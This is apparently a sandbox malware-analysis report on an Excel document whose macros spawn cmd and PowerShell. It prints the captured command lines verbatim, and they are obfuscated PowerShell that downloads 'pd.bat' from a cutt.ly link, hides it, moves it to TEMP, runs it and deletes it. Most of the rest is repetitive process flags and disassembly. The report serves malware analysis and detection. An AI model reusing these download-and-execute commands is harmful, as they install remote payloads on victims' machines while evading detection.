Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.batJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.974047058.0000000007290000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03419B20 push eax; mov dword ptr [esp], ecx6_2_03419B54
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034169E8 push eax; mov dword ptr [esp], edx6_2_034169FC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034169F8 push eax; mov dword ptr [esp], edx6_2_034169FC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034164F8 push eax; mov dword ptr [esp], edx6_2_0341650C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03465C50 pushfd ; iretd 6_2_03465C51
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_023A3110 push esi; iretd 9_2_023A311E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_023A3721 push esi; iretd 9_2_023A372E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_023A4DFF push ebp; iretd 9_2_023A4E0E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027AA2E0 push es; ret 9_2_027AA2F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027AFD27 pushfd ; iretd 9_2_027AFD39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027BD511 push eax; ret 9_2_027BD523
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027BEAC1 push 1FF406B3h; retf 9_2_027BEACE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033A1958 push ebp; ret 12_2_033A1960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033A9811 push es; ret 12_2_033A9826
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033B1930 push eax; ret 12_2_033B1961
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033B1962 push eax; ret 12_2_033B1961
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033B98B8 pushad ; retf 12_2_033B98C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033BD5B0 push eax; ret 12_2_033BD5E3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033BD5D1 push eax; ret 12_2_033BD5E3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C597C1 push es; ret 14_2_06C597C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5372F push esp; iretd 14_2_06C53739
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5AC89 push ss; ret 14_2_06C5AC8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5AC51 push ss; ret 14_2_06C5AC52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C59C29 push es; ret 14_2_06C59C2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5AC30 push ss; ret 14_2_06C5AC32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5AC33 push ss; ret 14_2_06C5AC3A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5BDA1 push ds; ret 14_2_06C5BDA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5AD0B push ss; ret 14_2_06C5AD12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5AB98 push ss; ret 14_2_06C5AB9A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07450653 push B40730F3h; retf 14_2_0745066D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0796BF57 push E8CB8B05h; retf 14_2_0796BF61
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
